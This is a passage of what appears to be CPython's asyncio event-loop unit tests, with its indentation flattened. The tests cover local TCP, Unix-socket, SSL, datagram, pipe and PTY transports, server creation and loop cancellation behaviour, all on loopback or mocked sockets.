peername=httpd.address)
def test_legacy_create_ssl_unix_connection(self):
with test_utils.force_legacy_ssl_support():
self.test_create_ssl_unix_connection()
def test_create_connection_local_addr(self):
with test_utils.run_test_server() as httpd:
port = support.find_unused_port()
f = self.loop.create_connection(
lambda: MyProto(loop=self.loop),
*httpd.address, local_addr=(httpd.address[0], port))
tr, pr = self.loop.run_until_complete(f)
expected = pr.transport.get_extra_info('sockname')[1]
self.assertEqual(port, expected)
tr.close()
def test_create_connection_local_addr_in_use(self):
with test_utils.run_test_server() as httpd:
f = self.loop.create_connection(
lambda: MyProto(loop=self.loop),
*httpd.address, local_addr=httpd.address)
with self.assertRaises(OSError) as cm:
self.loop.run_until_complete(f)
self.assertEqual(cm.exception.errno, errno.EADDRINUSE)
self.assertIn(str(httpd.address), cm.exception.strerror)
def test_connect_accepted_socket(self, server_ssl=None, client_ssl=None):
loop = self.loop
class MyProto(MyBaseProto):
def connection_lost(self, exc):
super().connection_lost(exc)
loop.call_soon(loop.stop)
def data_received(self, data):
super().data_received(data)
self.transport.write(expected_response)
lsock = socket.socket()
lsock.bind(('127.0.0.1', 0))
lsock.listen(1)
addr = lsock.getsockname()
message = b'test data'
response = None
expected_response = b'roger'
def client():
nonlocal response
try:
csock = socket.socket()
if client_ssl is not None:
csock = client_ssl.wrap_socket(csock)
csock.connect(addr)
csock.sendall(message)
response = csock.recv(99)
csock.close()
except Exception as exc:
print(
"Failure in client thread in test_connect_accepted_socket",
exc)
thread = threading.Thread(target=client, daemon=True)
thread.start()
conn, _ = lsock.accept()
proto = MyProto(loop=loop)
proto.loop = loop
loop.run_until_complete(
loop.connect_accepted_socket(
(lambda: proto), conn, ssl=server_ssl))
loop.run_forever()
proto.transport.close()
lsock.close()
thread.join(1)
self.assertFalse(thread.is_alive())
self.assertEqual(proto.state, 'CLOSED')
self.assertEqual(proto.nbytes, len(message))
self.assertEqual(response, expected_response)
@unittest.skipIf(ssl is None, 'No ssl module')
def test_ssl_connect_accepted_socket(self):
if (sys.platform == 'win32' and
sys.version_info < (3, 5) and
isinstance(self.loop, proactor_events.BaseProactorEventLoop)
):
raise unittest.SkipTest(
'SSL not supported with proactor event loops before Python 3.5'
)
server_context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
server_context.load_cert_chain(ONLYCERT, ONLYKEY)
if hasattr(server_context, 'check_hostname'):
server_context.check_hostname = False
server_context.verify_mode = ssl.CERT_NONE
client_context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
if hasattr(server_context, 'check_hostname'):
client_context.check_hostname = False
client_context.verify_mode = ssl.CERT_NONE
self.test_connect_accepted_socket(server_context, client_context)
@mock.patch('asyncio.base_events.socket')
def create_server_multiple_hosts(self, family, hosts, mock_sock):
@asyncio.coroutine
def getaddrinfo(host, port, *args, **kw):
if family == socket.AF_INET:
return [(family, socket.SOCK_STREAM, 6, '', (host, port))]
else:
return [(family, socket.SOCK_STREAM, 6, '', (host, port, 0, 0))]
def getaddrinfo_task(*args, **kwds):
return asyncio.Task(getaddrinfo(*args, **kwds), loop=self.loop)
unique_hosts = set(hosts)
if family == socket.AF_INET:
mock_sock.socket().getsockbyname.side_effect = [
(host, 80) for host in unique_hosts]
else:
mock_sock.socket().getsockbyname.side_effect = [
(host, 80, 0, 0) for host in unique_hosts]
self.loop.getaddrinfo = getaddrinfo_task
self.loop._start_serving = mock.Mock()
self.loop._stop_serving = mock.Mock()
f = self.loop.create_server(lambda: MyProto(self.loop), hosts, 80)
server = self.loop.run_until_complete(f)
self.addCleanup(server.close)
server_hosts = {sock.getsockbyname()[0] for sock in server.sockets}
self.assertEqual(server_hosts, unique_hosts)
def test_create_server_multiple_hosts_ipv4(self):
self.create_server_multiple_hosts(socket.AF_INET,
['1.2.3.4', '5.6.7.8', '1.2.3.4'])
def test_create_server_multiple_hosts_ipv6(self):
self.create_server_multiple_hosts(socket.AF_INET6,
['::1', '::2', '::1'])
def test_create_server(self):
proto = MyProto(self.loop)
f = self.loop.create_server(lambda: proto, '0.0.0.0', 0)
server = self.loop.run_until_complete(f)
self.assertEqual(len(server.sockets), 1)
sock = server.sockets[0]
host, port = sock.getsockname()
self.assertEqual(host, '0.0.0.0')
client = socket.socket()
client.connect(('127.0.0.1', port))
client.sendall(b'xxx')
self.loop.run_until_complete(proto.connected)
self.assertEqual('CONNECTED', proto.state)
test_utils.run_until(self.loop, lambda: proto.nbytes > 0)
self.assertEqual(3, proto.nbytes)
# extra info is available
self.assertIsNotNone(proto.transport.get_extra_info('sockname'))
self.assertEqual('127.0.0.1',
proto.transport.get_extra_info('peername')[0])
# close connection
proto.transport.close()
self.loop.run_until_complete(proto.done)
self.assertEqual('CLOSED', proto.state)
# the client socket must be closed after to avoid ECONNRESET upon
# recv()/send() on the serving socket
client.close()
# close server
server.close()
@unittest.skipUnless(hasattr(socket, 'SO_REUSEPORT'), 'No SO_REUSEPORT')
def test_create_server_reuse_port(self):
proto = MyProto(self.loop)
f = self.loop.create_server(
lambda: proto, '0.0.0.0', 0)
server = self.loop.run_until_complete(f)
self.assertEqual(len(server.sockets), 1)
sock = server.sockets[0]
self.assertFalse(
sock.getsockopt(
socket.SOL_SOCKET, socket.SO_REUSEPORT))
server.close()
test_utils.run_briefly(self.loop)
proto = MyProto(self.loop)
f = self.loop.create_server(
lambda: proto, '0.0.0.0', 0, reuse_port=True)
server = self.loop.run_until_complete(f)
self.assertEqual(len(server.sockets), 1)
sock = server.sockets[0]
self.assertTrue(
sock.getsockopt(
socket.SOL_SOCKET, socket.SO_REUSEPORT))
server.close()
def _make_unix_server(self, factory, **kwargs):
path = test_utils.gen_unix_socket_path()
self.addCleanup(lambda: os.path.exists(path) and os.unlink(path))
f = self.loop.create_unix_server(factory, path, **kwargs)
server = self.loop.run_until_complete(f)
return server, path
@unittest.skipUnless(hasattr(socket, 'AF_UNIX'), 'No UNIX Sockets')
def test_create_unix_server(self):
proto = MyProto(loop=self.loop)
server, path = self._make_unix_server(lambda: proto)
self.assertEqual(len(server.sockets), 1)
client = socket.socket(socket.AF_UNIX)
client.connect(path)
client.sendall(b'xxx')
self.loop.run_until_complete(proto.connected)
self.assertEqual('CONNECTED', proto.state)
test_utils.run_until(self.loop, lambda: proto.nbytes > 0)
self.assertEqual(3, proto.nbytes)
# close connection
proto.transport.close()
self.loop.run_until_complete(proto.done)
self.assertEqual('CLOSED', proto.state)
# the client socket must be closed after to avoid ECONNRESET upon
# recv()/send() on the serving socket
client.close()
# close server
server.close()
@unittest.skipUnless(hasattr(socket, 'AF_UNIX'), 'No UNIX Sockets')
def test_create_unix_server_path_socket_error(self):
proto = MyProto(loop=self.loop)
sock = socket.socket()
with sock:
f = self.loop.create_unix_server(lambda: proto, '/test', sock=sock)
with self.assertRaisesRegex(ValueError,
'path and sock can not be specified '
'at the same time'):
self.loop.run_until_complete(f)
def _create_ssl_context(self, certfile, keyfile=None):
sslcontext = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
sslcontext.options |= ssl.OP_NO_SSLv2
sslcontext.load_cert_chain(certfile, keyfile)
return sslcontext
def _make_ssl_server(self, factory, certfile, keyfile=None):
sslcontext = self._create_ssl_context(certfile, keyfile)
f = self.loop.create_server(factory, '127.0.0.1', 0, ssl=sslcontext)
server = self.loop.run_until_complete(f)
sock = server.sockets[0]
host, port = sock.getsockname()
self.assertEqual(host, '127.0.0.1')
return server, host, port
def _make_ssl_unix_server(self, factory, certfile, keyfile=None):
sslcontext = self._create_ssl_context(certfile, keyfile)
return self._make_unix_server(factory, ssl=sslcontext)
@unittest.skipIf(ssl is None, 'No ssl module')
def test_create_server_ssl(self):
proto = MyProto(loop=self.loop)
server, host, port = self._make_ssl_server(
lambda: proto, ONLYCERT, ONLYKEY)
f_c = self.loop.create_connection(MyBaseProto, host, port,
ssl=test_utils.dummy_ssl_context())
client, pr = self.loop.run_until_complete(f_c)
client.write(b'xxx')
self.loop.run_until_complete(proto.connected)
self.assertEqual('CONNECTED', proto.state)
test_utils.run_until(self.loop, lambda: proto.nbytes > 0)
self.assertEqual(3, proto.nbytes)
# extra info is available
self.check_ssl_extra_info(client, peername=(host, port))
# close connection
proto.transport.close()
self.loop.run_until_complete(proto.done)
self.assertEqual('CLOSED', proto.state)
# the client socket must be closed after to avoid ECONNRESET upon
# recv()/send() on the serving socket
client.close()
# stop serving
server.close()
def test_legacy_create_server_ssl(self):
with test_utils.force_legacy_ssl_support():
self.test_create_server_ssl()
@unittest.skipIf(ssl is None, 'No ssl module')
@unittest.skipUnless(hasattr(socket, 'AF_UNIX'), 'No UNIX Sockets')
def test_create_unix_server_ssl(self):
proto = MyProto(loop=self.loop)
server, path = self._make_ssl_unix_server(
lambda: proto, ONLYCERT, ONLYKEY)
f_c = self.loop.create_unix_connection(
MyBaseProto, path, ssl=test_utils.dummy_ssl_context(),
server_hostname='')
client, pr = self.loop.run_until_complete(f_c)
client.write(b'xxx')
self.loop.run_until_complete(proto.connected)
self.assertEqual('CONNECTED', proto.state)
test_utils.run_until(self.loop, lambda: proto.nbytes > 0)
self.assertEqual(3, proto.nbytes)
# close connection
proto.transport.close()
self.loop.run_until_complete(proto.done)
self.assertEqual('CLOSED', proto.state)
# the client socket must be closed after to avoid ECONNRESET upon
# recv()/send() on the serving socket
client.close()
# stop serving
server.close()
def test_legacy_create_unix_server_ssl(self):
with test_utils.force_legacy_ssl_support():
self.test_create_unix_server_ssl()
@unittest.skipIf(ssl is None, 'No ssl module')
def test_create_server_ssl_verify_failed(self):
proto = MyProto(loop=self.loop)
server, host, port = self._make_ssl_server(
lambda: proto, SIGNED_CERTFILE)
sslcontext_client = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
sslcontext_client.options |= ssl.OP_NO_SSLv2
sslcontext_client.verify_mode = ssl.CERT_REQUIRED
if hasattr(sslcontext_client, 'check_hostname'):
sslcontext_client.check_hostname = True
# no CA loaded
f_c = self.loop.create_connection(MyProto, host, port,
ssl=sslcontext_client)
with mock.patch.object(self.loop, 'call_exception_handler'):
with test_utils.disable_logger():
with self.assertRaisesRegex(ssl.SSLError,
'(?i)certificate.verify.failed'):
self.loop.run_until_complete(f_c)
# execute the loop to log the connection error
test_utils.run_briefly(self.loop)
# close connection
self.assertIsNone(proto.transport)
server.close()
def test_legacy_create_server_ssl_verify_failed(self):
with test_utils.force_legacy_ssl_support():
self.test_create_server_ssl_verify_failed()
@unittest.skipIf(ssl is None, 'No ssl module')
@unittest.skipUnless(hasattr(socket, 'AF_UNIX'), 'No UNIX Sockets')
def test_create_unix_server_ssl_verify_failed(self):
proto = MyProto(loop=self.loop)
server, path = self._make_ssl_unix_server(
lambda: proto, SIGNED_CERTFILE)
sslcontext_client = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
sslcontext_client.options |= ssl.OP_NO_SSLv2
sslcontext_client.verify_mode = ssl.CERT_REQUIRED
if hasattr(sslcontext_client, 'check_hostname'):
sslcontext_client.check_hostname = True
# no CA loaded
f_c = self.loop.create_unix_connection(MyProto, path,
ssl=sslcontext_client,
server_hostname='invalid')
with mock.patch.object(self.loop, 'call_exception_handler'):
with test_utils.disable_logger():
with self.assertRaisesRegex(ssl.SSLError,
'(?i)certificate.verify.failed'):
self.loop.run_until_complete(f_c)
# execute the loop to log the connection error
test_utils.run_briefly(self.loop)
# close connection
self.assertIsNone(proto.transport)
server.close()
def test_legacy_create_unix_server_ssl_verify_failed(self):
with test_utils.force_legacy_ssl_support():
self.test_create_unix_server_ssl_verify_failed()
@unittest.skipIf(ssl is None, 'No ssl module')
def test_create_server_ssl_match_failed(self):
proto = MyProto(loop=self.loop)
server, host, port = self._make_ssl_server(
lambda: proto, SIGNED_CERTFILE)
sslcontext_client = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
sslcontext_client.options |= ssl.OP_NO_SSLv2
sslcontext_client.verify_mode = ssl.CERT_REQUIRED
sslcontext_client.load_verify_locations(
cafile=SIGNING_CA)
if hasattr(sslcontext_client, 'check_hostname'):
sslcontext_client.check_hostname = True
# incorrect server_hostname
with mock.patch.object(self.loop, 'call_exception_handler'):
with test_utils.disable_logger():
with self.assertRaisesRegex(
ssl.CertificateError,
"hostname '127.0.0.1' doesn't match 'localhost'"):
self.loop.run_until_complete(
self.loop.create_connection(MyProto, host, port,
ssl=sslcontext_client))
# close connection
proto.transport.close()
server.close()
def test_legacy_create_server_ssl_match_failed(self):
with test_utils.force_legacy_ssl_support():
self.test_create_server_ssl_match_failed()
@unittest.skipIf(ssl is None, 'No ssl module')
@unittest.skipUnless(hasattr(socket, 'AF_UNIX'), 'No UNIX Sockets')
def test_create_unix_server_ssl_verified(self):
proto = MyProto(loop=self.loop)
server, path = self._make_ssl_unix_server(
lambda: proto, SIGNED_CERTFILE)
sslcontext_client = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
sslcontext_client.options |= ssl.OP_NO_SSLv2
sslcontext_client.verify_mode = ssl.CERT_REQUIRED
sslcontext_client.load_verify_locations(cafile=SIGNING_CA)
if hasattr(sslcontext_client, 'check_hostname'):
sslcontext_client.check_hostname = True
# Connection succeeds with correct CA and server hostname.
f_c = self.loop.create_unix_connection(MyProto, path,
ssl=sslcontext_client,
server_hostname='localhost')
client, pr = self.loop.run_until_complete(f_c)
# close connection
proto.transport.close()
client.close()
server.close()
self.loop.run_until_complete(proto.done)
def test_legacy_create_unix_server_ssl_verified(self):
with test_utils.force_legacy_ssl_support():
self.test_create_unix_server_ssl_verified()
@unittest.skipIf(ssl is None, 'No ssl module')
def test_create_server_ssl_verified(self):
proto = MyProto(loop=self.loop)
server, host, port = self._make_ssl_server(
lambda: proto, SIGNED_CERTFILE)
sslcontext_client = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
sslcontext_client.options |= ssl.OP_NO_SSLv2
sslcontext_client.verify_mode = ssl.CERT_REQUIRED
sslcontext_client.load_verify_locations(cafile=SIGNING_CA)
if hasattr(sslcontext_client, 'check_hostname'):
sslcontext_client.check_hostname = True
# Connection succeeds with correct CA and server hostname.
f_c = self.loop.create_connection(MyProto, host, port,
ssl=sslcontext_client,
server_hostname='localhost')
client, pr = self.loop.run_until_complete(f_c)
# extra info is available
        self.check_ssl_extra_info(client, peername=(host, port),
peercert=PEERCERT)
# close connection
proto.transport.close()
client.close()
server.close()
self.loop.run_until_complete(proto.done)
def test_legacy_create_server_ssl_verified(self):
with test_utils.force_legacy_ssl_support():
self.test_create_server_ssl_verified()
def test_create_server_sock(self):
proto = asyncio.Future(loop=self.loop)
class TestMyProto(MyProto):
def connection_made(self, transport):
super().connection_made(transport)
proto.set_result(self)
sock_ob = socket.socket(type=socket.SOCK_STREAM)
sock_ob.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock_ob.bind(('0.0.0.0', 0))
f = self.loop.create_server(TestMyProto, sock=sock_ob)
server = self.loop.run_until_complete(f)
sock = server.sockets[0]
self.assertIs(sock, sock_ob)
host, port = sock.getsockname()
self.assertEqual(host, '0.0.0.0')
client = socket.socket()
client.connect(('127.0.0.1', port))
client.send(b'xxx')
client.close()
server.close()
def test_create_server_addr_in_use(self):
sock_ob = socket.socket(type=socket.SOCK_STREAM)
sock_ob.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock_ob.bind(('0.0.0.0', 0))
f = self.loop.create_server(MyProto, sock=sock_ob)
server = self.loop.run_until_complete(f)
sock = server.sockets[0]
host, port = sock.getsockname()
f = self.loop.create_server(MyProto, host=host, port=port)
with self.assertRaises(OSError) as cm:
self.loop.run_until_complete(f)
self.assertEqual(cm.exception.errno, errno.EADDRINUSE)
server.close()
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 not supported or enabled')
def test_create_server_dual_stack(self):
f_proto = asyncio.Future(loop=self.loop)
class TestMyProto(MyProto):
def connection_made(self, transport):
super().connection_made(transport)
f_proto.set_result(self)
try_count = 0
while True:
try:
port = support.find_unused_port()
f = self.loop.create_server(TestMyProto, host=None, port=port)
server = self.loop.run_until_complete(f)
except OSError as ex:
if ex.errno == errno.EADDRINUSE:
try_count += 1
self.assertGreaterEqual(5, try_count)
continue
else:
raise
else:
break
client = socket.socket()
client.connect(('127.0.0.1', port))
client.send(b'xxx')
proto = self.loop.run_until_complete(f_proto)
proto.transport.close()
client.close()
f_proto = asyncio.Future(loop=self.loop)
client = socket.socket(socket.AF_INET6)
client.connect(('::1', port))
client.send(b'xxx')
proto = self.loop.run_until_complete(f_proto)
proto.transport.close()
client.close()
server.close()
def test_server_close(self):
f = self.loop.create_server(MyProto, '0.0.0.0', 0)
server = self.loop.run_until_complete(f)
sock = server.sockets[0]
host, port = sock.getsockname()
client = socket.socket()
client.connect(('127.0.0.1', port))
client.send(b'xxx')
client.close()
server.close()
client = socket.socket()
self.assertRaises(
ConnectionRefusedError, client.connect, ('127.0.0.1', port))
client.close()
def test_create_datagram_endpoint(self):
class TestMyDatagramProto(MyDatagramProto):
def __init__(inner_self):
super().__init__(loop=self.loop)
def datagram_received(self, data, addr):
super().datagram_received(data, addr)
self.transport.sendto(b'resp:'+data, addr)
coro = self.loop.create_datagram_endpoint(
TestMyDatagramProto, local_addr=('127.0.0.1', 0))
s_transport, server = self.loop.run_until_complete(coro)
host, port = s_transport.get_extra_info('sockname')
self.assertIsInstance(s_transport, asyncio.Transport)
self.assertIsInstance(server, TestMyDatagramProto)
self.assertEqual('INITIALIZED', server.state)
self.assertIs(server.transport, s_transport)
coro = self.loop.create_datagram_endpoint(
lambda: MyDatagramProto(loop=self.loop),
remote_addr=(host, port))
transport, client = self.loop.run_until_complete(coro)
self.assertIsInstance(transport, asyncio.Transport)
self.assertIsInstance(client, MyDatagramProto)
self.assertEqual('INITIALIZED', client.state)
self.assertIs(client.transport, transport)
transport.sendto(b'xxx')
test_utils.run_until(self.loop, lambda: server.nbytes)
self.assertEqual(3, server.nbytes)
test_utils.run_until(self.loop, lambda: client.nbytes)
# received
self.assertEqual(8, client.nbytes)
# extra info is available
self.assertIsNotNone(transport.get_extra_info('sockname'))
# close connection
transport.close()
self.loop.run_until_complete(client.done)
self.assertEqual('CLOSED', client.state)
server.transport.close()
def test_create_datagram_endpoint_sock(self):
if (sys.platform == 'win32' and
isinstance(self.loop, proactor_events.BaseProactorEventLoop)):
raise unittest.SkipTest(
'UDP is not supported with proactor event loops')
sock = None
local_address = ('127.0.0.1', 0)
infos = self.loop.run_until_complete(
self.loop.getaddrinfo(
*local_address, type=socket.SOCK_DGRAM))
for family, type, proto, cname, address in infos:
try:
sock = socket.socket(family=family, type=type, proto=proto)
sock.setblocking(False)
sock.bind(address)
except:
pass
else:
break
else:
assert False, 'Can not create socket.'
f = self.loop.create_datagram_endpoint(
lambda: MyDatagramProto(loop=self.loop), sock=sock)
tr, pr = self.loop.run_until_complete(f)
self.assertIsInstance(tr, asyncio.Transport)
self.assertIsInstance(pr, MyDatagramProto)
tr.close()
self.loop.run_until_complete(pr.done)
def test_internal_fds(self):
loop = self.create_event_loop()
if not isinstance(loop, selector_events.BaseSelectorEventLoop):
loop.close()
self.skipTest('loop is not a BaseSelectorEventLoop')
self.assertEqual(1, loop._internal_fds)
loop.close()
self.assertEqual(0, loop._internal_fds)
self.assertIsNone(loop._csock)
self.assertIsNone(loop._ssock)
@unittest.skipUnless(sys.platform != 'win32',
"Don't support pipes for Windows")
def test_read_pipe(self):
proto = MyReadPipeProto(loop=self.loop)
rpipe, wpipe = os.pipe()
pipeobj = io.open(rpipe, 'rb', 1024)
@asyncio.coroutine
def connect():
t, p = yield from self.loop.connect_read_pipe(
lambda: proto, pipeobj)
self.assertIs(p, proto)
self.assertIs(t, proto.transport)
self.assertEqual(['INITIAL', 'CONNECTED'], proto.state)
self.assertEqual(0, proto.nbytes)
self.loop.run_until_complete(connect())
os.write(wpipe, b'1')
test_utils.run_until(self.loop, lambda: proto.nbytes >= 1)
self.assertEqual(1, proto.nbytes)
os.write(wpipe, b'2345')
test_utils.run_until(self.loop, lambda: proto.nbytes >= 5)
self.assertEqual(['INITIAL', 'CONNECTED'], proto.state)
self.assertEqual(5, proto.nbytes)
os.close(wpipe)
self.loop.run_until_complete(proto.done)
self.assertEqual(
['INITIAL', 'CONNECTED', 'EOF', 'CLOSED'], proto.state)
# extra info is available
self.assertIsNotNone(proto.transport.get_extra_info('pipe'))
@unittest.skipUnless(sys.platform != 'win32',
"Don't support pipes for Windows")
def test_unclosed_pipe_transport(self):
# This test reproduces the issue #314 on GitHub
loop = self.create_event_loop()
read_proto = MyReadPipeProto(loop=loop)
write_proto = MyWritePipeProto(loop=loop)
rpipe, wpipe = os.pipe()
rpipeobj = io.open(rpipe, 'rb', 1024)
wpipeobj = io.open(wpipe, 'w', 1024)
@asyncio.coroutine
def connect():
read_transport, _ = yield from loop.connect_read_pipe(
lambda: read_proto, rpipeobj)
write_transport, _ = yield from loop.connect_write_pipe(
lambda: write_proto, wpipeobj)
return read_transport, write_transport
# Run and close the loop without closing the transports
read_transport, write_transport = loop.run_until_complete(connect())
loop.close()
# These 'repr' calls used to raise an AttributeError
# See Issue #314 on GitHub
self.assertIn('open', repr(read_transport))
self.assertIn('open', repr(write_transport))
# Clean up (avoid ResourceWarning)
rpipeobj.close()
wpipeobj.close()
read_transport._pipe = None
write_transport._pipe = None
@unittest.skipUnless(sys.platform != 'win32',
"Don't support pipes for Windows")
# select, poll and kqueue don't support character devices (PTY) on Mac OS X
# older than 10.6 (Snow Leopard)
@support.requires_mac_ver(10, 6)
    # Issue #20495: The test hangs on FreeBSD 7.2 but passes on FreeBSD 9
@support.requires_freebsd_version(8)
def test_read_pty_output(self):
proto = MyReadPipeProto(loop=self.loop)
master, slave = os.openpty()
master_read_obj = io.open(master, 'rb', 0)
@asyncio.coroutine
def connect():
t, p = yield from self.loop.connect_read_pipe(lambda: proto,
master_read_obj)
self.assertIs(p, proto)
self.assertIs(t, proto.transport)
self.assertEqual(['INITIAL', 'CONNECTED'], proto.state)
self.assertEqual(0, proto.nbytes)
self.loop.run_until_complete(connect())
os.write(slave, b'1')
test_utils.run_until(self.loop, lambda: proto.nbytes)
self.assertEqual(1, proto.nbytes)
os.write(slave, b'2345')
test_utils.run_until(self.loop, lambda: proto.nbytes >= 5)
self.assertEqual(['INITIAL', 'CONNECTED'], proto.state)
self.assertEqual(5, proto.nbytes)
os.close(slave)
self.loop.run_until_complete(proto.done)
self.assertEqual(
['INITIAL', 'CONNECTED', 'EOF', 'CLOSED'], proto.state)
# extra info is available
self.assertIsNotNone(proto.transport.get_extra_info('pipe'))
@unittest.skipUnless(sys.platform != 'win32',
"Don't support pipes for Windows")
def test_write_pipe(self):
rpipe, wpipe = os.pipe()
pipeobj = io.open(wpipe, 'wb', 1024)
proto = MyWritePipeProto(loop=self.loop)
connect = self.loop.connect_write_pipe(lambda: proto, pipeobj)
transport, p = self.loop.run_until_complete(connect)
self.assertIs(p, proto)
self.assertIs(transport, proto.transport)
self.assertEqual('CONNECTED', proto.state)
transport.write(b'1')
data = bytearray()
def reader(data):
chunk = os.read(rpipe, 1024)
data += chunk
return len(data)
test_utils.run_until(self.loop, lambda: reader(data) >= 1)
self.assertEqual(b'1', data)
transport.write(b'2345')
test_utils.run_until(self.loop, lambda: reader(data) >= 5)
self.assertEqual(b'12345', data)
self.assertEqual('CONNECTED', proto.state)
os.close(rpipe)
# extra info is available
self.assertIsNotNone(proto.transport.get_extra_info('pipe'))
# close connection
proto.transport.close()
self.loop.run_until_complete(proto.done)
self.assertEqual('CLOSED', proto.state)
@unittest.skipUnless(sys.platform != 'win32',
"Don't support pipes for Windows")
def test_write_pipe_disconnect_on_close(self):
rsock, wsock = test_utils.socketpair()
rsock.setblocking(False)
pipeobj = io.open(wsock.detach(), 'wb', 1024)
proto = MyWritePipeProto(loop=self.loop)
connect = self.loop.connect_write_pipe(lambda: proto, pipeobj)
transport, p = self.loop.run_until_complete(connect)
self.assertIs(p, proto)
self.assertIs(transport, proto.transport)
self.assertEqual('CONNECTED', proto.state)
transport.write(b'1')
data = self.loop.run_until_complete(self.loop.sock_recv(rsock, 1024))
self.assertEqual(b'1', data)
rsock.close()
self.loop.run_until_complete(proto.done)
self.assertEqual('CLOSED', proto.state)
@unittest.skipUnless(sys.platform != 'win32',
"Don't support pipes for Windows")
# select, poll and kqueue don't support character devices (PTY) on Mac OS X
# older than 10.6 (Snow Leopard)
@support.requires_mac_ver(10, 6)
def test_write_pty(self):
master, slave = os.openpty()
slave_write_obj = io.open(slave, 'wb', 0)
proto = MyWritePipeProto(loop=self.loop)
connect = self.loop.connect_write_pipe(lambda: proto, slave_write_obj)
transport, p = self.loop.run_until_complete(connect)
self.assertIs(p, proto)
self.assertIs(transport, proto.transport)
self.assertEqual('CONNECTED', proto.state)
transport.write(b'1')
data = bytearray()
def reader(data):
chunk = os.read(master, 1024)
data += chunk
return len(data)
test_utils.run_until(self.loop, lambda: reader(data) >= 1,
timeout=10)
self.assertEqual(b'1', data)
transport.write(b'2345')
test_utils.run_until(self.loop, lambda: reader(data) >= 5,
timeout=10)
self.assertEqual(b'12345', data)
self.assertEqual('CONNECTED', proto.state)
os.close(master)
# extra info is available
self.assertIsNotNone(proto.transport.get_extra_info('pipe'))
# close connection
proto.transport.close()
self.loop.run_until_complete(proto.done)
self.assertEqual('CLOSED', proto.state)
@unittest.skipUnless(sys.platform != 'win32',
"Don't support pipes for Windows")
# select, poll and kqueue don't support character devices (PTY) on Mac OS X
# older than 10.6 (Snow Leopard)
@support.requires_mac_ver(10, 6)
def test_bidirectional_pty(self):
master, read_slave = os.openpty()
write_slave = os.dup(read_slave)
tty.setraw(read_slave)
slave_read_obj = io.open(read_slave, 'rb', 0)
read_proto = MyReadPipeProto(loop=self.loop)
read_connect = self.loop.connect_read_pipe(lambda: read_proto,
slave_read_obj)
read_transport, p = self.loop.run_until_complete(read_connect)
self.assertIs(p, read_proto)
self.assertIs(read_transport, read_proto.transport)
self.assertEqual(['INITIAL', 'CONNECTED'], read_proto.state)
self.assertEqual(0, read_proto.nbytes)
slave_write_obj = io.open(write_slave, 'wb', 0)
write_proto = MyWritePipeProto(loop=self.loop)
write_connect = self.loop.connect_write_pipe(lambda: write_proto,
slave_write_obj)
write_transport, p = self.loop.run_until_complete(write_connect)
self.assertIs(p, write_proto)
self.assertIs(write_transport, write_proto.transport)
self.assertEqual('CONNECTED', write_proto.state)
data = bytearray()
def reader(data):
chunk = os.read(master, 1024)
data += chunk
return len(data)
write_transport.write(b'1')
test_utils.run_until(self.loop, lambda: reader(data) >= 1, timeout=10)
self.assertEqual(b'1', data)
self.assertEqual(['INITIAL', 'CONNECTED'], read_proto.state)
self.assertEqual('CONNECTED', write_proto.state)
os.write(master, b'a')
test_utils.run_until(self.loop, lambda: read_proto.nbytes >= 1,
timeout=10)
self.assertEqual(['INITIAL', 'CONNECTED'], read_proto.state)
self.assertEqual(1, read_proto.nbytes)
self.assertEqual('CONNECTED', write_proto.state)
write_transport.write(b'2345')
test_utils.run_until(self.loop, lambda: reader(data) >= 5, timeout=10)
self.assertEqual(b'12345', data)
self.assertEqual(['INITIAL', 'CONNECTED'], read_proto.state)
self.assertEqual('CONNECTED', write_proto.state)
os.write(master, b'bcde')
test_utils.run_until(self.loop, lambda: read_proto.nbytes >= 5,
timeout=10)
self.assertEqual(['INITIAL', 'CONNECTED'], read_proto.state)
self.assertEqual(5, read_proto.nbytes)
self.assertEqual('CONNECTED', write_proto.state)
os.close(master)
read_transport.close()
self.loop.run_until_complete(read_proto.done)
self.assertEqual(
['INITIAL', 'CONNECTED', 'EOF', 'CLOSED'], read_proto.state)
write_transport.close()
self.loop.run_until_complete(write_proto.done)
self.assertEqual('CLOSED', write_proto.state)
def test_prompt_cancellation(self):
r, w = test_utils.socketpair()
r.setblocking(False)
f = self.loop.sock_recv(r, 1)
ov = getattr(f, 'ov', None)
if ov is not None:
self.assertTrue(ov.pending)
@asyncio.coroutine
def main():
try:
self.loop.call_soon(f.cancel)
yield from f
except asyncio.CancelledError:
res = 'cancelled'
else:
res = None
finally:
self.loop.stop()
return res
start = time.monotonic()
t = asyncio.Task(main(), loop=self.loop)
self.loop.run_forever()
elapsed = time.monotonic() - start
self.assertLess(elapsed, 0.5)
self.assertEqual(t.result(), 'cancelled')
self.assertRaises(asyncio.CancelledError, f.result)
if ov is not None:
self.assertFalse(ov.pending)
self.loop._stop_serving(r)
r.close()
w.close()
def test_timeout_rounding(self):
def _run_once():
self.loop._run_once_counter += 1
orig_run_once()
orig_run_once = self.loop._run_once
self.loop._run_once_counter = 0
self.loop._run_once = _run_once
@asyncio.coroutine
def wait():
loop = self.loop
yield from asyncio.sleep(1e-2, loop=loop)
yield from asyncio.sleep(1e-4, loop=loop)
yield from asyncio.sleep(1e-6, loop=loop)
yield from asyncio.sleep(1e-8, loop=loop)
yield from asyncio.sleep(1e-10, loop=loop)
self.loop.run_until_complete(wait())
        # The ideal number of calls is 12, but on some platforms the selector
        # may sleep a little less than the timeout, depending on the resolution
        # of the clock used by the kernel. Tolerate a few extra calls on
        # these platforms.
self.assertLessEqual(self.loop._run_once_counter, 20,
{'clock_resolution': self.loop._clock_resolution,
'selector': self.loop._selector.__class__.__name__})
def test_remove_fds_after_closing(self):
loop = self.create_event_loop()
callback = lambda: None
r, w = test_utils.socketpair()
self.addCleanup(r.close)
self.addCleanup(w.close)
loop.add_reader(r, callback)
loop.add_writer(w, callback)
loop.close()
self.assertFalse(loop.remove_reader(r))
self.assertFalse(loop.remove_writer(w))
def test_add_fds_after_closing(self):
loop = self.create_event_loop()
callback = lambda: None
r, w = test_utils.socketpair()
self.addCleanup(r.close)
self.addCleanup(w.close)
loop.close()
with self.assertRaises(RuntimeError):
loop.add_reader(r, callback)
